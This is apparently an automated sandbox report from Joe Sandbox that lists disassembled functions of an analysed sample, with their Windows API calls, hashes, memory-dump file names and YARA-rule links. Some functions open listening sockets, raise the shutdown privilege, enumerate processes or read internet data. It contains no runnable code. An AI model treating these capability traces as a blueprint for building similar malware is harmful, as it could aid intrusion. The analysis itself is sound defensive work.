Opcode ID: 35efd238f5e331fb8b4f2342a6d2d3b936cfe3c48c85bbdbcdd22209d4500c4f
Instruction ID: 4274d6d99254e0d25c0c3d77e296a770c2cf037c895b4355243c83f3868a74f3
Opcode Fuzzy Hash: 35efd238f5e331fb8b4f2342a6d2d3b936cfe3c48c85bbdbcdd22209d4500c4f
Instruction Fuzzy Hash: 4BA24C74E0421A8BDF28CF58C9907ADB7F1FB54314F1482EAD85AA7380E774AE85DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00BD5A05
_memmove.LIBCMT ref: 00BD5A55
_memmove.LIBCMT ref: 00BD5ABB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 95b8fa1049a46b914ebbe151263973f9bcb105011e89df80fa43cb57cddae294
Instruction ID: d28039bd17096a4b6c314f34e2603643a5cee0b781fc931c2ca75a6268225a2f
Opcode Fuzzy Hash: 95b8fa1049a46b914ebbe151263973f9bcb105011e89df80fa43cb57cddae294
Instruction Fuzzy Hash: AD127870A00609DFDF14DFA5D981AEEB7F5FF48300F2045AAE406A7291EB35AE91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C2545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C18CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C18D0D
Part of subcall function 00C18CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18D3A
Part of subcall function 00C18CC3: GetLastError.KERNEL32 ref: 00C18D47

ExitWindowsEx.USER32(?,00000000), ref: 00C2549B

Strings

SeShutdownPrivilege, xrefs: 00C2546B
, xrefs: 00C25489
@, xrefs: 00C2548E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 69557a3f49c935c10df270207f9938a7fa7c23b60b91d9ea6e2eb797ca1d466f
Instruction ID: 6385f9b6d424c05c047a928cd9adc93753ac843c22023ebffe96efdc03a74411
Opcode Fuzzy Hash: 69557a3f49c935c10df270207f9938a7fa7c23b60b91d9ea6e2eb797ca1d466f
Instruction Fuzzy Hash: E7014739A55B312AE7287678FC4ABBBF258EB06353F200034FC16E24D2DAB00D8081A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C365EF
WSAGetLastError.WSOCK32(00000000), ref: 00C365FE
bind.WSOCK32(00000000,?,00000010), ref: 00C3661A
listen.WSOCK32(00000000,00000005), ref: 00C36629
WSAGetLastError.WSOCK32(00000000), ref: 00C36643
closesocket.WSOCK32(00000000,00000000), ref: 00C36657

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 583eefa22e11f144fa4a825e0c085ecad20982e199247b45198b3c42b40b2c8d
Instruction ID: d828ca0303abc7a7fae8e5ffb912dc4e5414d4dbebf6421de4d59b6fa36b7701
Opcode Fuzzy Hash: 583eefa22e11f144fa4a825e0c085ecad20982e199247b45198b3c42b40b2c8d
Instruction Fuzzy Hash: F4218C34200200AFDB10AF64C84AB6EB7F9EF46720F15816DF96AA72D2CB74AD019B51

Uniqueness

Uniqueness Score: -1.00%

Function 00BD5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00BE0FF6: std::exception::exception.LIBCMT ref: 00BE102C
Part of subcall function 00BE0FF6: __CxxThrowException@8.LIBCMT ref: 00BE1041

_memmove.LIBCMT ref: 00C1062F
_memmove.LIBCMT ref: 00C10744
_memmove.LIBCMT ref: 00C107EB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: b2705d728013dedb0073b2791e223bbfdf8729a5489ad471831a6ac445a9e290
Instruction ID: 703f3d8fea5563583e861dbbdf903dff4060204ea00309d46c4661d1fe4d81ed
Opcode Fuzzy Hash: b2705d728013dedb0073b2791e223bbfdf8729a5489ad471831a6ac445a9e290
Instruction Fuzzy Hash: 2802A070A00205DBDF14DF65D981AAEBBF5FF44300F2480A9E80ADB395EB71DA91DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BC19FA
GetSysColor.USER32(0000000F), ref: 00BC1A4E
SetBkColor.GDI32(?,00000000), ref: 00BC1A61

Part of subcall function 00BC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: ddf6604bd5fbc7cf6b5d26f315edd329fa2dd8d0643539abbede4b16a6217971
Instruction ID: b64478932d4d361867fb9cd67f87fc74e76c02b9acf70f75af9a70678d7f2c76
Opcode Fuzzy Hash: ddf6604bd5fbc7cf6b5d26f315edd329fa2dd8d0643539abbede4b16a6217971
Instruction Fuzzy Hash: 5EA12671106548BAEA28AB2D8CD4FBF25DDEB47341F14099DF513F6193CE24DD02A2B5

Uniqueness

Uniqueness Score: -1.00%

Function 00C36A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C380A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C380CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C36AB1
WSAGetLastError.WSOCK32(00000000), ref: 00C36ADA
bind.WSOCK32(00000000,?,00000010), ref: 00C36B13
WSAGetLastError.WSOCK32(00000000), ref: 00C36B20
closesocket.WSOCK32(00000000,00000000), ref: 00C36B34

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 9838a922de46bc2483b25a2128d0f0a3e4b95762fb9bf4466e65fa8d00c2d717
Instruction ID: 60bdc70793a28d08db73c76a94b0ee70b6a610014ec04d032f7114420d65c8a3
Opcode Fuzzy Hash: 9838a922de46bc2483b25a2128d0f0a3e4b95762fb9bf4466e65fa8d00c2d717
Instruction Fuzzy Hash: 7B41B175700610AFEB10AF24DC8AF6E77E8AB05B14F04809CF91AAB3C2CB709D019B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C455FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00C4564C
IsWindowEnabled.USER32 ref: 00C4565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00C45667
IsIconic.USER32 ref: 00C45675
IsZoomed.USER32 ref: 00C45683

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2342bddfd840fa4e5a45169561c666942870116fcfd3937058cbed2943f58306
Instruction ID: 49eb8ab0da1dcba2f7c92c27b49e2ead73f39d2ed5d73e3d066f6635cd014036
Opcode Fuzzy Hash: 2342bddfd840fa4e5a45169561c666942870116fcfd3937058cbed2943f58306
Instruction Fuzzy Hash: 7511B2717009106FE7212F26DC44FAF7798FF45721B42402DF816D7352CB709A028AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00C01D88,?), ref: 00C3C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C3C324

Strings

kernel32.dll, xrefs: 00C3C30D
GetSystemWow64DirectoryW, xrefs: 00C3C31E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: d01829e44288d3a6fbb38bb6a5b890c36a197c1e7150710a19edeb6378ac73e2
Instruction ID: 694b40fcbd9785fc9250016c98854acc563e90dd8ba0c3b157364761d7e05221
Opcode Fuzzy Hash: d01829e44288d3a6fbb38bb6a5b890c36a197c1e7150710a19edeb6378ac73e2
Instruction Fuzzy Hash: DCE0ECB5610713CFDB605F25D844B9E76D4FB09755F80C43DE8AAE2260E770D841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD3190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 7434271b73ab04cc078a3964ae8f272acaad0f24e6dcc72f3fcd27a018b88f70
Instruction ID: bbb7249a235abc621a7253cfe4ebd4d24aff5b98740b0c75a906a3ae70b278de
Opcode Fuzzy Hash: 7434271b73ab04cc078a3964ae8f272acaad0f24e6dcc72f3fcd27a018b88f70
Instruction Fuzzy Hash: A32289716083019FD724DF24C891B6EF7E4AF84704F14496EF89A97392EB71EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C3F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00C3F151
Process32FirstW.KERNEL32(00000000,?), ref: 00C3F15F

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

Process32NextW.KERNEL32(00000000,?), ref: 00C3F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C3F22E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 0b508cae4d163803200f3b5c2289230f0902c18b898930a983052cf9344d9cf9
Instruction ID: 48b90ffd202a79e5d27097500801f7aeafd6d4ee88d17ab0bae8ff39c5435e74
Opcode Fuzzy Hash: 0b508cae4d163803200f3b5c2289230f0902c18b898930a983052cf9344d9cf9
Instruction Fuzzy Hash: 78515971504701AFD320EF20D885F6FBBE8BF94710F10486DF496962A1EB70AA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C240B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C240D1
_memset.LIBCMT ref: 00C240F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C24144
CloseHandle.KERNEL32(00000000), ref: 00C2414D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 0c97ced9dd74509c114a1a57a3fad2678d7184d5a5e2e09b7e59044f9bd56a70
Instruction ID: 1736e4a54b3e5b873f40a0d7e11406a6610485b8a124cd322ef7255b0aeb8b63
Opcode Fuzzy Hash: 0c97ced9dd74509c114a1a57a3fad2678d7184d5a5e2e09b7e59044f9bd56a70
Instruction Fuzzy Hash: 8F119475901228BAD7309AA5AC4DFAFBBBCEB45760F1041AAF908D7190D6744F808BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C1EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C1EB19

Strings

|, xrefs: 00C1EB49
(, xrefs: 00C1EB5F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: f388523daf199a3638c7a26c204022c8b73e96540029a45e3af1bb5661f18a54
Instruction ID: b09b794f1b91f449412f8df0268a6cbf5d78341612286fe15fb156a994ea3f41
Opcode Fuzzy Hash: f388523daf199a3638c7a26c204022c8b73e96540029a45e3af1bb5661f18a54
Instruction Fuzzy Hash: CD323675A04605DFCB28CF19C491AAAB7F1FF48310B15C56EE8AACB3A1D770E981DB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C325E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00C326D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C3270C

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 909a8c1d1cf55a455bb99eb8a01401c41ce971295285b4c4ecda7df3465ea785
Instruction ID: b7cabcc5fa47857ac4c568602811608fcb63fceda57cd4f19164a636a6c9e27f
Opcode Fuzzy Hash: 909a8c1d1cf55a455bb99eb8a01401c41ce971295285b4c4ecda7df3465ea785
Instruction Fuzzy Hash: 5F41D171910209BFEF209A95DC86EBBB7FCEF40724F10406AFA11A6140EA719E41AA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C2B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C2B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C2B655

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 38897a56c0493f66eeed3931b9bd40f59e0f8168501d04627dbc6a92e8ffb312
Instruction ID: 8c75c0d2161f7f4f022d734e47f3f0eb081a7e18524497a63867e2d51252997d
Opcode Fuzzy Hash: 38897a56c0493f66eeed3931b9bd40f59e0f8168501d04627dbc6a92e8ffb312
Instruction Fuzzy Hash: 6C212C35A00518EFDB00EF65D884FAEBBB8FF49310F1480A9E905AB351DB31A956DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C18CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BE0FF6: std::exception::exception.LIBCMT ref: 00BE102C
Part of subcall function 00BE0FF6: __CxxThrowException@8.LIBCMT ref: 00BE1041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C18D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18D3A
GetLastError.KERNEL32 ref: 00C18D47

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 06871114fc175be4155f021a961f01ad914191a53db930c52fd0dd14c304ec68
Instruction ID: cd3d8265609a77bbba635f8ceea96df480588bb25fb63daa93498bcb8d8c6684
Opcode Fuzzy Hash: 06871114fc175be4155f021a961f01ad914191a53db930c52fd0dd14c304ec68
Instruction Fuzzy Hash: 2611C1B1414309AFD728EF54EC85E6BB7FDFB45710B20856EF45683241EB70EC818A60

Uniqueness

Uniqueness Score: -1.00%

Function 00C24C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C24C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C24C43
FreeSid.ADVAPI32(?), ref: 00C24C53

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
Instruction ID: f4a7ec490b6f14702dd0e7d8a9cc5372f4ea6e0cbfd2291a42732eed97048f69
Opcode Fuzzy Hash: 3ccd61f5e8bc377154bff73b37e578d97dd987fa1ba9c81cf689fb63a4d16487
Instruction Fuzzy Hash: B1F03779A11208BBDB04DFE4DC89AAEBBB8FB08211F0044A9A901E2181E7706A048B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BCE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6ff1ed91438aa2d5a065b9887cd8ded59e0a08ae38af2eca4d5d13a93d3665a
Instruction ID: 656ce9bea4b45de5697785c816904d2b9809bd886235c0da052de91541730943
Opcode Fuzzy Hash: e6ff1ed91438aa2d5a065b9887cd8ded59e0a08ae38af2eca4d5d13a93d3665a
Instruction Fuzzy Hash: AA225770A00256CFDB24DF58C481BAAB7F4FF44300F1485ADE866AB391E775EA85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C2C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C2C966
FindClose.KERNEL32(00000000), ref: 00C2C996

Memory Dump Source

